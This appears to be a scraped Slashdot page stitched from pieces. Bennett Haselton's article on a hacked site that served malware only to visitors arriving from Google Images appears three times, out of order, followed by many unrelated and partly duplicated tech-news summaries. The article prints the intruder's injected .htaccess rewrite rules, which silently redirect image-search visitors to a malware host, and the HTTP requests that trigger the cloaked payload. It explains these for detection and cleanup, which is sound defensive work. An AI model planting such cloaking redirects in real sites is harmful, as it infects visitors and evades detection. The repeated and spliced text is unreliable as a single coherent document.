It turned out that the tradingblox.com had been hacked, and pages had been installed onto the server that would serve malware in an unusual way: If the page was being viewed in a frame loaded from Google Images, or as as result of a click through from Google Images, then the page would serve content that attempted to infect the user's computer with malware. On the other hand, if the page was viewed normally (as a result of typing the page into your browser), the malware-loading code would not be served. That means if you were to telnet to port 80 on the www.tradingblox.com server, and request a page as follows:

GET /tradingblox/courses.htm HTTP/1.1
Host: www.tradingblox.com

then the normal page would be returned. But if you entered these commands:

GET /tradingblox/courses.htm HTTP/1.1
Host: www.tradingblox.com
Referer: http://images.google.com/

then you would get the malware-infected page. (The webmaster has since fixed the problem, so that the latter request will no longer get the malware code.) The webserver would only serve the infected content if "images.google.com" was sent specifically as the referrer; "www.google.com" by itself would not trigger the result.

(For the uninitiated, when you click a link from one page to another, for example if you were reading an article on CNN.com which had a link to http://www.google.com/support/ and you clicked on that link, then when your browser requested the file "/support/" from the www.google.com server, it would send the request as follows:

GET /support/ HTTP/1.1
Host: www.google.com
Referer: http://www.cnn.com/article.url.goes.here/

So the webmasters of www.google.com can see what links people are clicking from other websites to reach the www.google.com site. Many sites use this to track which links from other pages, including advertisements that they've bought on other sites, are sending them the most traffic.)

Denis Sinegubko, owner of the website malware-infection checking site UnmaskParasites.com, says that he had seen pages before which would serve infected content if www.google.com itself were listed in the Referer: field. However, this was the first instance he'd seen where the content was only served if images.google.com was specifically listed as the Referer. Since no malware distributor would manually break into just one website to compromise it in this exact manner, it's extremely likely that there are many more sites that are infected in the same way. Stonewall Ballard noted that the Google Safe Browsing lookup for the hosting company where tradingblox.com is hosted, showed a high number of other sites on the same network that had been infected recently. (And those are only the infected sites that Google knows about -- recall that Google didn't even know that tradingblox.com was infected.)

Obviously, from the malware author's point of view, the point of serving malware content only some of the time rather than all of the time, is to make it harder for webmasters to pinpoint the problem. Someone gets the malware warning after following a link or loading a page via Google Images, and sends the webmaster an e-mail saying, "I got infected by your webpage, here is the link." The webmaster views the link and says, "I don't know what you're talking about, there's no malware code on that page." It also makes it harder for automated site-checking tools to detect the infection. Google's Safe Browsing lookup tool reported the site as uninfected, and Sinegubko's site-checking tool on UnmaskParasites.com also reported no malware infections on tradingblox.com, even while the site was still infected. (Sinegubko said he would possibly modify his site-checking script so that in addition to the other checks it performs, it will attempt to request a page sending "http://images.google.com/" in the "Referer:" field, to see if that results in different content being served. Google's Safe Browsing spider should do the same.)

Sinegubko said he's also seen instances where hacked sites would cover their tracks even further, by refusing to display infected content if the Referer: link from Google contained "inurl:domainname.com" or "site:domainname.com". This is because webmasters would sometimes check if their site was serving infected content in response to a click from Google, by doing a Google search on their own domainname.com, and following the link back to their site. By not serving the infected content in that case, the malware infection becomes even harder to detect.

This also makes it harder to report the exploits to the hosting companies that host infected websites. In case the webmaster of the infected site doesn't respond to complaints that their site is infected, sometimes you have to contact the hosting company and ask them to forcibly take the website offline until the problem is fixed. And I have been hosted by several companies where the tech support and abuse departments were (just barely) competent enough that if I called them up and said, "Your customer is hosting a malware-infected webpage, go to this page and view the source code, and you can see the malicious code", they would have known what to do. But if I'd had to tell them to follow the steps above -- "telnet to port 80" on the infected website, and type a few lines to mimic the process of a browser sending HTTP request headers to the website -- I probably would have lost them at "telnet". (Recall an experiment wherein I e-mailed some hosting companies from a Hotmail account, asking them to change the nameservers for a domain that I had hosted with them, and about half of the hosting companies agreed to switch the domain nameservers -- essentially, transferring the entire website to an unknown third party -- without ever authenticating that it was really me writing from that Hotmail account. Which means anybody could have taken over those websites simply by sending an e-mail. Front-end tech support at cheap hosting companies is often not very smart.)

Fortunately, Tim Arnold, the webmaster of the tradingblox.com site, did respond to the original report about the malware-infected pages, and found that an intruder had hacked the site on November 30th and inserted these lines into an .htaccess file:

RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*images.google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*images.search.yahoo.*$ [NC]
RewriteRule .* http://search-box.in/in.cgi?4&parameter=u [R,L]
<Files 403.shtml>
order allow,deny
allow from all
</Files>

which resulted in the infected pages being served whenever a user loaded the site via Google Images. (So if you found this article because you think your own site might be infected by malware that serves pages conditionally on the Referer: field, that's the first place to look to fix the problem!)

It's uncertain how Arnold's site got infected in the first place, but Sinegubko had earlier said that almost 90% of breakins in 2009 that occurred on Linux-hosted sites, were caused by malware installed surreptitiously on people's Windows PCs and stealing the passwords that people used to administer their sites. Or the site could have been compromised via a WordPress exploit such as this one. As I always tell anyone who will listen, if you want to keep your Linux-hosted website from being broken into, one of the most frequently overlooked precautions that you need to take is to keep your Windows PC free of spyware.

But the larger point is that as malware becomes more aggressive, it's not just going to become harder to keep your PC and websites uninfected. It's also going to become harder for site owners and for hosting company abuse departments to verify that a site has been hacked, as the hacks use more sophisticated techniques to prevent the infection from being discovered. Abuse report handlers will have to be trained to understand what it means that a website is only showing infected content as a result of a "Referer:" header, and ideally should know enough about networking and command-line tools, to be able to mimic the "telnet" instructions above. (Most expensive dedicated hosting companies like RackSpace, do have technical staff who are at least that knowledgeable. But cheap shared hosting companies -- the kind where you can get your domain transferred to another company by sending an e-mail from an unauthenticated Hotmail account -- will have to train their abuse staff better.) Automated site-checking tools like Google's Safe Browsing spider and UnmaskParasites.com's site checker will have to start taking these attacks into account when checking a site for infection.

And as always, keeping your PC free of spyware, shouldn't be viewed just as a convenience to yourself, but as an obligation to your neighbors as well. (A case of the positive/negative externalities problem in economics.) You wouldn't send your kid to school with the flu, so why did you get your Mom on the Internet without buying her some anti-virus software?

Slashdot frequent contributor Bennett Haselton writes "Sites that have been hacked by malware writers are now serving infected content only when the visitor views the site through a frame on Google Images. This recent twist on a standard trick used by malware writers, makes it harder for webmasters and hosting companies to discover that their sites have been infected. Automated tools that check websites for infections and training procedures for hosting company abuse-department staffers will have to be updated accordingly." Read on for the rest of Bennett's thoughts.

A friend of mine recently e-mailed a discussion list with an interesting query. Stonewall Ballard had searched on "tradingbloxlogo" on Google Images, which led to the results on this page. Clicking on the first result, an image from the tradingblox.com site, took him to this page, with the Google information header at the top, and loading the http://www.tradingblox.com/tradingblox/courses.htm page in a frame in the bottom half of the browser window. When that page was loaded in that bottom frame, Internet Explorer and Firefox would both flash warnings about the page being infected with malware. But if you loaded the http://www.tradingblox.com/tradingblox/courses.htm page in a normal Web browser window by itself, the browser would not display any warning, and checking the site using Google's malware query form returned a result saying the site was not suspicious. Why the differing results?

It turned out that the tradingblox.com had been hacked, and pages had been installed onto the server that would serve malware in an unusual way: If the page was being viewed in a frame loaded from Google Images, or as as result of a click through from Google Images, then the page would serve content that attempted to infect the user's computer with malware. On the other hand, if the page was viewed normally (as a result of typing the page into your browser), the malware-loading code would not be served. That means if you were to telnet to port 80 on the www.tradingblox.com server, and request a page as follows:

GET /tradingblox/courses.htm HTTP/1.1
Host: www.tradingblox.com

then the normal page would be returned. But if you entered these commands:

GET /tradingblox/courses.htm HTTP/1.1
Host: www.tradingblox.com
Referer: http://images.google.com/

then you would get the malware-infected page. (The webmaster has since fixed the problem, so that the latter request will no longer get the malware code.) The webserver would only serve the infected content if "images.google.com" was sent specifically as the referrer; "www.google.com" by itself would not trigger the result.

(For the uninitiated, when you click a link from one page to another, for example if you were reading an article on CNN.com which had a link to http://www.google.com/support/ and you clicked on that link, then when your browser requested the file "/support/" from the www.google.com server, it would send the request as follows:

GET /support/ HTTP/1.1
Host: www.google.com
Referer: http://www.cnn.com/article.url.goes.here/

So the webmasters of www.google.com can see what links people are clicking from other websites to reach the www.google.com site. Many sites use this to track which links from other pages, including advertisements that they've bought on other sites, are sending them the most traffic.)

Denis Sinegubko, owner of the website malware-infection checking site UnmaskParasites.com, says that he had seen pages before which would serve infected content if www.google.com itself were listed in the Referer: field. However, this was the first instance he'd seen where the content was only served if images.google.com was specifically listed as the Referer. Since no malware distributor would manually break into just one website to compromise it in this exact manner, it's extremely likely that there are many more sites that are infected in the same way. Stonewall Ballard noted that the Google Safe Browsing lookup for the hosting company where tradingblox.com is hosted, showed a high number of other sites on the same network that had been infected recently. (And those are only the infected sites that Google knows about -- recall that Google didn't even know that tradingblox.com was infected.)

Obviously, from the malware author's point of view, the point of serving malware content only some of the time rather than all of the time, is to make it harder for webmasters to pinpoint the problem. Someone gets the malware warning after following a link or loading a page via Google Images, and sends the webmaster an e-mail saying, "I got infected by your webpage, here is the link." The webmaster views the link and says, "I don't know what you're talking about, there's no malware code on that page." It also makes it harder for automated site-checking tools to detect the infection. Google's Safe Browsing lookup tool reported the site as uninfected, and Sinegubko's site-checking tool on UnmaskParasites.com also reported no malware infections on tradingblox.com, even while the site was still infected. (Sinegubko said he would possibly modify his site-checking script so that in addition to the other checks it performs, it will attempt to request a page sending "http://images.google.com/" in the "Referer:" field, to see if that results in different content being served. Google's Safe Browsing spider should do the same.)

Sinegubko said he's also seen instances where hacked sites would cover their tracks even further, by refusing to display infected content if the Referer: link from Google contained "inurl:domainname.com" or "site:domainname.com". This is because webmasters would sometimes check if their site was serving infected content in response to a click from Google, by doing a Google search on their own domainname.com, and following the link back to their site. By not serving the infected content in that case, the malware infection becomes even harder to detect.

This also makes it harder to report the exploits to the hosting companies that host infected websites. In case the webmaster of the infected site doesn't respond to complaints that their site is infected, sometimes you have to contact the hosting company and ask them to forcibly take the website offline until the problem is fixed. And I have been hosted by several companies where the tech support and abuse departments were (just barely) competent enough that if I called them up and said, "Your customer is hosting a malware-infected webpage, go to this page and view the source code, and you can see the malicious code", they would have known what to do. But if I'd had to tell them to follow the steps above -- "telnet to port 80" on the infected website, and type a few lines to mimic the process of a browser sending HTTP request headers to the website -- I probably would have lost them at "telnet". (Recall an experiment wherein I e-mailed some hosting companies from a Hotmail account, asking them to change the nameservers for a domain that I had hosted with them, and about half of the hosting companies agreed to switch the domain nameservers -- essentially, transferring the entire website to an unknown third party -- without ever authenticating that it was really me writing from that Hotmail account. Which means anybody could have taken over those websites simply by sending an e-mail. Front-end tech support at cheap hosting companies is often not very smart.)

Fortunately, Tim Arnold, the webmaster of the tradingblox.com site, did respond to the original report about the malware-infected pages, and found that an intruder had hacked the site on November 30th and inserted these lines into an .htaccess file:

RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*images.google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*images.search.yahoo.*$ [NC]
RewriteRule .* http://search-box.in/in.cgi?4&parameter=u [R,L]
<Files 403.shtml>
order allow,deny
allow from all
</Files>

which resulted in the infected pages being served whenever a user loaded the site via Google Images. (So if you found this article because you think your own site might be infected by malware that serves pages conditionally on the Referer: field, that's the first place to look to fix the problem!)

It's uncertain how Arnold's site got infected in the first place, but Sinegubko had earlier said that almost 90% of breakins in 2009 that occurred on Linux-hosted sites, were caused by malware installed surreptitiously on people's Windows PCs and stealing the passwords that people used to administer their sites. Or the site could have been compromised via a WordPress exploit such as this one. As I always tell anyone who will listen, if you want to keep your Linux-hosted website from being broken into, one of the most frequently overlooked precautions that you need to take is to keep your Windows PC free of spyware.

But the larger point is that as malware becomes more aggressive, it's not just going to become harder to keep your PC and websites uninfected. It's also going to become harder for site owners and for hosting company abuse departments to verify that a site has been hacked, as the hacks use more sophisticated techniques to prevent the infection from being discovered. Abuse report handlers will have to be trained to understand what it means that a website is only showing infected content as a result of a "Referer:" header, and ideally should know enough about networking and command-line tools, to be able to mimic the "telnet" instructions above. (Most expensive dedicated hosting companies like RackSpace, do have technical staff who are at least that knowledgeable. But cheap shared hosting companies -- the kind where you can get your domain transferred to another company by sending an e-mail from an unauthenticated Hotmail account -- will have to train their abuse staff better.) Automated site-checking tools like Google's Safe Browsing spider and UnmaskParasites.com's site checker will have to start taking these attacks into account when checking a site for infection.

And as always, keeping your PC free of spyware, shouldn't be viewed just as a convenience to yourself, but as an obligation to your neighbors as well. (A case of the positive/negative externalities problem in economics.) You wouldn't send your kid to school with the flu, so why did you get your Mom on the Internet without buying her some anti-virus software?

Slashdot frequent contributor Bennett Haselton writes "Sites that have been hacked by malware writers are now serving infected content only when the visitor views the site through a frame on Google Images. This recent twist on a standard trick used by malware writers, makes it harder for webmasters and hosting companies to discover that their sites have been infected. Automated tools that check websites for infections and training procedures for hosting company abuse-department staffers will have to be updated accordingly." Read on for the rest of Bennett's thoughts.

A friend of mine recently e-mailed a discussion list with an interesting query. Stonewall Ballard had searched on "tradingbloxlogo" on Google Images, which led to the results on this page. Clicking on the first result, an image from the tradingblox.com site, took him to this page, with the Google information header at the top, and loading the http://www.tradingblox.com/tradingblox/courses.htm page in a frame in the bottom half of the browser window. When that page was loaded in that bottom frame, Internet Explorer and Firefox would both flash warnings about the page being infected with malware. But if you loaded the http://www.tradingblox.com/tradingblox/courses.htm page in a normal Web browser window by itself, the browser would not display any warning, and checking the site using Google's malware query form returned a result saying the site was not suspicious. Why the differing results?

It turned out that the tradingblox.com had been hacked, and pages had been installed onto the server that would serve malware in an unusual way: If the page was being viewed in a frame loaded from Google Images, or as as result of a click through from Google Images, then the page would serve content that attempted to infect the user's computer with malware. On the other hand, if the page was viewed normally (as a result of typing the page into your browser), the malware-loading code would not be served. That means if you were to telnet to port 80 on the www.tradingblox.com server, and request a page as follows:

GET /tradingblox/courses.htm HTTP/1.1
Host: www.tradingblox.com

then the normal page would be returned. But if you entered these commands:

GET /tradingblox/courses.htm HTTP/1.1
Host: www.tradingblox.com
Referer: http://images.google.com/

then you would get the malware-infected page. (The webmaster has since fixed the problem, so that the latter request will no longer get the malware code.) The webserver would only serve the infected content if "images.google.com" was sent specifically as the referrer; "www.google.com" by itself would not trigger the result.

(For the uninitiated, when you click a link from one page to another, for example if you were reading an article on CNN.com which had a link to http://www.google.com/support/ and you clicked on that link, then when your browser requested the file "/support/" from the www.google.com server, it would send the request as follows:

GET /support/ HTTP/1.1
Host: www.google.com
Referer: http://www.cnn.com/article.url.goes.here/

So the webmasters of www.google.com can see what links people are clicking from other websites to reach the www.google.com site. Many sites use this to track which links from other pages, including advertisements that they've bought on other sites, are sending them the most traffic.)

Denis Sinegubko, owner of the website malware-infection checking site UnmaskParasites.com, says that he had seen pages before which would serve infected content if www.google.com itself were listed in the Referer: field. However, this was the first instance he'd seen where the content was only served if images.google.com was specifically listed as the Referer. Since no malware distributor would manually break into just one website to compromise it in this exact manner, it's extremely likely that there are many more sites that are infected in the same way. Stonewall Ballard noted that the Google Safe Browsing lookup for the hosting company where tradingblox.com is hosted, showed a high number of other sites on the same network that had been infected recently. (And those are only the infected sites that Google knows about -- recall that Google didn't even know that tradingblox.com was infected.)

Obviously, from the malware author's point of view, the point of serving malware content only some of the time rather than all of the time, is to make it harder for webmasters to pinpoint the problem. Someone gets the malware warning after following a link or loading a page via Google Images, and sends the webmaster an e-mail saying, "I got infected by your webpage, here is the link." The webmaster views the link and says, "I don't know what you're talking about, there's no malware code on that page." It also makes it harder for automated site-checking tools to detect the infection. Google's Safe Browsing lookup tool reported the site as uninfected, and Sinegubko's site-checking tool on UnmaskParasites.com also reported no malware infections on tradingblox.com, even while the site was still infected. (Sinegubko said he would possibly modify his site-checking script so that in addition to the other checks it performs, it will attempt to request a page sending "http://images.google.com/" in the "Referer:" field, to see if that results in different content being served. Google's Safe Browsing spider should do the same.)

Sinegubko said he's also seen instances where hacked sites would cover their tracks even further, by refusing to display infected content if the Referer: link from Google contained "inurl:domainname.com" or "site:domainname.com". This is because webmasters would sometimes check if their site was serving infected content in response to a click from Google, by doing a Google search on their own domainname.com, and following the link back to their site. By not serving the infected content in that case, the malware infection becomes even harder to detect.

This also makes it harder to report the exploits to the hosting companies that host infected websites. In case the webmaster of the infected site doesn't respond to complaints that their site is infected, sometimes you have to contact the hosting company and ask them to forcibly take the website offline until the problem is fixed. And I have been hosted by several companies where the tech support and abuse departments were (just barely) competent enough that if I called them up and said, "Your customer is hosting a malware-infected webpage, go to this page and view the source code, and you can see the malicious code", they would have known what to do. But if I'd had to tell them to follow the steps above -- "telnet to port 80" on the infected website, and type a few lines to mimic the process of a browser sending HTTP request headers to the website -- I probably would have lost them at "telnet". (Recall an experiment wherein I e-mailed some hosting companies from a Hotmail account, asking them to change the nameservers for a domain that I had hosted with them, and about half of the hosting companies agreed to switch the domain nameservers -- essentially, transferring the entire website to an unknown third party -- without ever authenticating that it was really me writing from that Hotmail account. Which means anybody could have taken over those websites simply by sending an e-mail. Front-end tech support at cheap hosting companies is often not very smart.)

Fortunately, Tim Arnold, the webmaster of the tradingblox.com site, did respond to the original report about the malware-infected pages, and found that an intruder had hacked the site on November 30th and inserted these lines into an .htaccess file:

RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*images.google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*images.search.yahoo.*$ [NC]
RewriteRule .* http://search-box.in/in.cgi?4&parameter=u [R,L]
<Files 403.shtml>
order allow,deny
allow from all
</Files>

which resulted in the infected pages being served whenever a user loaded the site via Google Images. (So if you found this article because you think your own site might be infected by malware that serves pages conditionally on the Referer: field, that's the first place to look to fix the problem!)

It's uncertain how Arnold's site got infected in the first place, but Sinegubko had earlier said that almost 90% of breakins in 2009 that occurred on Linux-hosted sites, were caused by malware installed surreptitiously on people's Windows PCs and stealing the passwords that people used to administer their sites. Or the site could have been compromised via a WordPress exploit such as this one. As I always tell anyone who will listen, if you want to keep your Linux-hosted website from being broken into, one of the most frequently overlooked precautions that you need to take is to keep your Windows PC free of spyware.

But the larger point is that as malware becomes more aggressive, it's not just going to become harder to keep your PC and websites uninfected. It's also going to become harder for site owners and for hosting company abuse departments to verify that a site has been hacked, as the hacks use more sophisticated techniques to prevent the infection from being discovered. Abuse report handlers will have to be trained to understand what it means that a website is only showing infected content as a result of a "Referer:" header, and ideally should know enough about networking and command-line tools, to be able to mimic the "telnet" instructions above. (Most expensive dedicated hosting companies like RackSpace, do have technical staff who are at least that knowledgeable. But cheap shared hosting companies -- the kind where you can get your domain transferred to another company by sending an e-mail from an unauthenticated Hotmail account -- will have to train their abuse staff better.) Automated site-checking tools like Google's Safe Browsing spider and UnmaskParasites.com's site checker will have to start taking these attacks into account when checking a site for infection.

And as always, keeping your PC free of spyware, shouldn't be viewed just as a convenience to yourself, but as an obligation to your neighbors as well. (A case of the positive/negative externalities problem in economics.) You wouldn't send your kid to school with the flu, so why did you get your Mom on the Internet without buying her some anti-virus software?

snydeq writes "Google is pushing out an update for the Nexus One that will fix a 3G connectivity problem and add limited support for multitouch. After receiving over 1,500 messages in a support forum from people complaining about trouble connecting to 3G, Google said it has identified the problem and has started delivering the fix. In addition to fixing 3G, the update adds the first applications to support multitouch. While the recent versions of the Android OS include multitouch capability, no phone in the US has supported it."

bratgitarre writes "A targeted phishing scam on companies trading with greenhouse gas emission certificates in Europe has reaped millions, Der Spiegel reports. By sending phishing e-mails to companies in Australia and New Zealand purporting to be from the German Ministry for Environmental Protection (German article, Google translation) the criminals obtained login credentials for companies owning polluting permissions. They then swiftly sold them to other polluters in various European countries. Damages are probably huge for a single incident, as 'one medium-sized German company alone had lost allowances worth €1.5 million ($2.1 million).' German federal officials, who can trace some of the transactions, claim that out of 2000 certificate sellers, seven responded to the scam."

Josh Triplett writes "Last October, Mozilla accepted the China Internet Network Information Center as a trusted CA root (Bugzilla entry). This affects Firefox, Thunderbird, and other products built on Mozilla technologies. The standard period for discussion passed without comment, and Mozilla accepted CNNIC based on the results of a formal audit. Commenters in the bug report and the associated discussion have presented evidence that the Chinese government controls CNNIC, and surfaced claims of malware production and distribution and previous man-in-the-middle attacks in China via their secondary CA root from Entrust. As usual, please refrain from blindly chiming into the discussion without supporting evidence. Since Mozilla has already accepted CNNIC as a trusted root CA, the burden rests with those who argue for its removal."

Seahawk was one of several readers to write in with news of Denmark's decision to embrace ODF. "On Friday morning Denmark decided to choose ODF over Microsoft's OOXML. For now the decision is only effective for governmental institutions, but regions and municipalities will most likely follow some time in the future. The decision has unfolded over a period of four years, and many open source advocates were fearing the worst, but it looks like the minister finally caved in and listened to what a lot of people were saying." While in transition away from Microsoft Office formats, the Danes may find use for this new OpenOffice integration guide (sent in by reader AdeleWard).

Seahawk was one of several readers to write in with news of Denmark's decision to embrace ODF. "On Friday morning Denmark decided to choose ODF over Microsoft's OOXML. For now the decision is only effective for governmental institutions, but regions and municipalities will most likely follow some time in the future. The decision has unfolded over a period of four years, and many open source advocates were fearing the worst, but it looks like the minister finally caved in and listened to what a lot of people were saying." While in transition away from Microsoft Office formats, the Danes may find use for this new OpenOffice integration guide (sent in by reader AdeleWard).

An anonymous reader writes "The long-awaited Russian stealth fighter, codenamed PAK FA or T-50, has had its first test flight today. This Google translation of a Russian article has a photo of the jet. Production is supposed to begin in 2015; the AP reports that India is helping with development. It's reportedly designed to compete with America's F-22 (first flight: 1997). Relatedly, according to Wikipedia, Japan is planning to fly its own stealth fighter, the ATD-X, which we have previously discussed, in 2011."

Andreas(R) writes "The Freeciv.net crew has benchmarked their web client, which is a rich web application using the HTML5 canvas element. This shows how fast Firefox, Google Chrome, Safari and Internet Explorer perform using the latest HTML5 web standards."

Hugh Pickens writes "An analysis of papers published in 10,500 academic journals across the world shows that, in terms of academic papers published, China is now second only to the US, and will take first place by 2020. Chinese scientists are increasing their output at a far faster rate than counterparts in rival 'emerging' nations such as India, Russia, and Brazil. The number of peer-reviewed papers published by Chinese researchers rose 64-fold over the past 30 years. 'China is out on its own, far ahead of the pack,' says James Wilsdon, of the Royal Society in London. 'If anything, China's recent research performance has exceeded even the high expectations of four or five years ago.' According to Wilsdon, three main factors are driving Chinese research. First is the government's enormous investment, with funding increases far above the rate of inflation, at all levels of the system from schools to postgraduate research. Second is the organized flow of knowledge from basic science to commercial applications. And third is the efficient and flexible way in which China is tapping the expertise of its extensive scientific diaspora in North America and Europe, tempting back mid-career scientists with deals that allow them to spend part of the year working in the West and part in China." Here's the Financial Times's original article.

theodp writes "If you're in the market for a new job, Fortune has just published its list of 100 Best Companies to Work For in 2010. Topping the list this year is SAS (SAS jobs), the largest privately held software company, which Fortune notes is populated with more statisticians than engineers or MBAs, and led by a Ph.D. founder whose first love is programming. Google (jobs), which once viewed SAS as model for employee perks, took the #4 spot, and Microsoft (jobs) checked in at #51."

Remember the Russian cop's YouTube narrative on police corruption? Reader Max_W writes with the news that Alexei Dymovsky, the cop whose videos started a movement, was arrested (Google translation; Russian original) on January 22, 2010. He is in prison in the south of Russia. Max_W adds: "It seems only a president is allowed to have a video blog in Russia."

kantier writes "The only (as far as I know) usable and free (as in beer) program for processing RAW photos outside Windows or OS X is now also free as in freedom. From version 3 onwards, the code is licensed under the GPL v3. The main developer's reasons for opening up the program are a lack of time/resources for full dedication, and a lack of interest in some parts of the program (likes to fiddle with image-processing algorithms, not so much the GUI part) — so the F/OSS model seems to be a perfect fit for this project."

krou writes "The BBC is reporting that Alan Ellis, who ran music file sharing site Oink from his flat in the UK, has been found not guilty of conspiracy to defraud. Between 2004 and 2007, the site 'facilitated the download of 21 million music files' by allowing its some 200,000 'members to find other people on the web who were prepared to share files.' Ellis was making £18,000 a month ($34,600) from donations from users, and claimed that he had no intention of defrauding copyright holders, and said 'All I do is really like Google, to really provide a connection between people. None of the music is on my website.'" Reader Andorin recommends Torrentfreak's coverage, which includes summaries of the closing arguments.

teqo writes "Hackers belonging to the Chaos Computer Club have allegedly cloned digital security ID cards for some German airports successfully which then allowed them access to all airport areas. According to the Spiegel Online article (transgoogleation here), they used a 200 Euro RFID reader to scan a valid security ID card, and since the scanner was able to pretend to be that card, used it to forge that valid ID. Even the airport authorities say that the involved system from 1992 might be outdated, but I guess it might be deployed elsewhere anyway."

rsk writes "One of the most popular questions on the Google Nexus One support forums is the 'Spotty 3G?' thread with almost 700 posts of users complaining about their 3G signal coverage fluctuating up, down, and between EDGE/3G with the phone just sitting on the desk or compared to other 3G devices on the T-Mobile network that don't offer the same unpredictable behavior. One workaround that seems to fix the issue is forcing the phone into '3G' or 'WCDMA Only' mode. This is a bit of a downer given that T-Mobile just finished their 3G upgrade to 7.2Mbps. Official word from Google is 'We are investigating this issue....'"

rsk writes "One of the most popular questions on the Google Nexus One support forums is the 'Spotty 3G?' thread with almost 700 posts of users complaining about their 3G signal coverage fluctuating up, down, and between EDGE/3G with the phone just sitting on the desk or compared to other 3G devices on the T-Mobile network that don't offer the same unpredictable behavior. One workaround that seems to fix the issue is forcing the phone into '3G' or 'WCDMA Only' mode. This is a bit of a downer given that T-Mobile just finished their 3G upgrade to 7.2Mbps. Official word from Google is 'We are investigating this issue....'"

rsk writes "One of the most popular questions on the Google Nexus One support forums is the 'Spotty 3G?' thread with almost 700 posts of users complaining about their 3G signal coverage fluctuating up, down, and between EDGE/3G with the phone just sitting on the desk or compared to other 3G devices on the T-Mobile network that don't offer the same unpredictable behavior. One workaround that seems to fix the issue is forcing the phone into '3G' or 'WCDMA Only' mode. This is a bit of a downer given that T-Mobile just finished their 3G upgrade to 7.2Mbps. Official word from Google is 'We are investigating this issue....'"

Ant writes "Google News carries a Canadian Press report that 'a new study has found that five times as many high school and college students in the United States are dealing with anxiety and other mental health issues than youth of the same age who were studied in the Great Depression era. ... Pulling together the data for the study was no small task. Led by [San Diego State University psychology professor Jean Twenge], researchers at five universities analyzed the responses of 77,576 high school or college students who, from 1938 through 2007, took the Minnesota Multiphasic Personality Inventory, or MMPI. The results will be published in a future issue of the Clinical Psychology Review. Overall, an average of five times as many students in 2007 surpassed thresholds in one or more mental health categories, compared with those who did so in 1938. A few individual categories increased at an even greater rate — with six times as many scoring high in two areas: 'hypomania,' a measure of anxiety and unrealistic optimism (from 5 per cent of students in 1938 to 31 per cent in 2007), and depression (from 1 per cent to 6 per cent).'"

necro81 writes "Google consumes massive amounts of electrical energy to power its data centers across the country and world. Now it has created a subsidiary, Google Energy LLC, and applied (pdf) to the Federal Energy Regulatory Commission to become a utility-scale energy trader. Google's stated aim is to be able to purchase renewable energy directly from producers at bulk rates, pursuing its goal of becoming carbon neutral. It is likely that Google Energy would also permit Google's own renewable energy projects to sell their energy at more favorable rates. Google reportedly does not have plans to actively become an energy broker, a la Enron."

The press conference at the Googleplex is over and Google's Nexus One phone has launched (official Google blog announcement). The NY Times confirms the bare details: manufactured by HTC; $529 unlocked, $179 with 2-year T-Mobile contract; coming to Verizon in the US, and Vodaphone in Europe, in "Spring 2010." The Times notes one desirable feature: "[Google] has also voice-enabled all text boxes in the device, so a user can speak into the device to, for instance, compose an e-mail, rather than type the text of the email." Walt Mossberg points out one limitation: "On the Nexus One, only 190 megabytes of its total 4.5 gigabytes of memory is allowed for storing apps. On the $199 iPhone, nearly all of the 16 gigabytes of memory can be used for apps." No answers yet to the obvious questions: can it tether on T-Mobile? Will it allow VoIP?

Hugh Pickens writes "Neuroscientists Gary Lynch and Richard Granger have an interesting article in Discover Magazine about the Boskops, an extinct hominid that had big eyes, child-like faces, and forebrains roughly 50% larger than modern man indicating they may have had an average intelligence of around 150, making them geniuses among Homo sapiens. The combination of a large cranium and immature face would look decidedly unusual to modern eyes, but not entirely unfamiliar. Such faces peer out from the covers of countless science fiction books and are often attached to 'alien abductors' in movies. Naturalist Loren Eiseley wrote: 'Back there in the past, ten thousand years ago. The man of the future, with the big brain, the small teeth. He lived in Africa. His brain was bigger than your brain.' The history of evolutionary studies has been dogged by the almost irresistible idea that evolution leads to greater complexity, to animals that are more advanced than their predecessor, yet the existence of the Boskops argues otherwise — that humans with big brains, and perhaps great intelligence, occupied a substantial piece of southern Africa in the not very distant past, and that they eventually gave way to smaller-brained, possibly less advanced Homo sapiens — that is, ourselves. 'With 30 percent larger brains than ours now, we can readily calculate that a population with a mean brain size of 1,750 cc would be expected to have an average IQ of 149,' write Lynch and Granger. But why did they go extinct? 'Maybe all that thoughtfulness was of no particular survival value in 10,000 BC. Lacking the external hard drive of a literate society, the Boskops were unable to exploit the vast potential locked up in their expanded cortex,' write Lynch and Granger. 'They were born just a few millennia too soon.'"

Gregory Diamos writes "An open source project, Ocelot, has recently released a just-in-time compiler for CUDA, allowing the same programs to be run on NVIDIA GPUs or x86 CPUs and providing an alternative to OpenCL. A description of the compiler was recently posted on the NVIDIA forums. The compiler works by translating GPU instructions to LLVM and then generating native code for any LLVM target. It has been validated against over 100 CUDA applications. All of the code is available under the New BSD license."

An anonymous reader writes "The Register reports that the proprietary document format used by the Amazon online store and Amazon's Kindle has been successfully reverse engineered, allowing these DRM-protected documents to be converted into the open MOBI format. Users of alternative e-book readers rejoice." Here are the hacker's notes on the program he is calling "Unswindle," and here is the (translated) forum where the Kindle challenge was posed and answered.

Darren Ginter writes "I find many aspects of desktop virtualization compelling, with one exception: the cost of the thin clients, which typically exceeds that of a traditional box. I understand all of the benefits of desktop virtualization (and the downsides, thanks) but I'm very hung up on spending more for less. While there are some sub-$200 products out there, they all seem to cut corners (give me non-vaporware that will drive a 22" LCD at full resolution). I can PXE boot a homebrew Atom-based thin client for $130, but I'd prefer to be able to buy something assembled. Am I missing something here?"

I Don't Believe in Imaginary Property writes "Verizon is defending its decision to double its Early Termination Fee from $175 to $350 after being called to account by the FCC. They claim it's because the higher fees allow them to offer more expensive phones with a lower up-front cost (PDF), and they also say that because they pro-rate the fee depending on how much of your contract is left, they still lose money. Apparently doing something about the Verizon customer service horror stories isn't as good a way to retain customers as telling them that they have to pay several hundred dollars to leave."

Thomas Nybergh writes "The Etherpad code was released by Google under the Apache license a few hours ago. Google's initial plan, after acquiring the service, was to use Etherpad's tech with its new Wave collaboration platform and to shut down the original service entirely. Soon after the Etherpad code was released, the Swedish Pirate Party launched their instance of the service at piratepad.net. An announcement, which also mentions a new Tor node, is published on the party website (Google translation). The original Etherpad service had in a short time become a killer application for collaborative work within at least the Swedish, and according to my personal experience, in the Finnish Pirate Party as well. The Etherpad open source project is available at Google Code."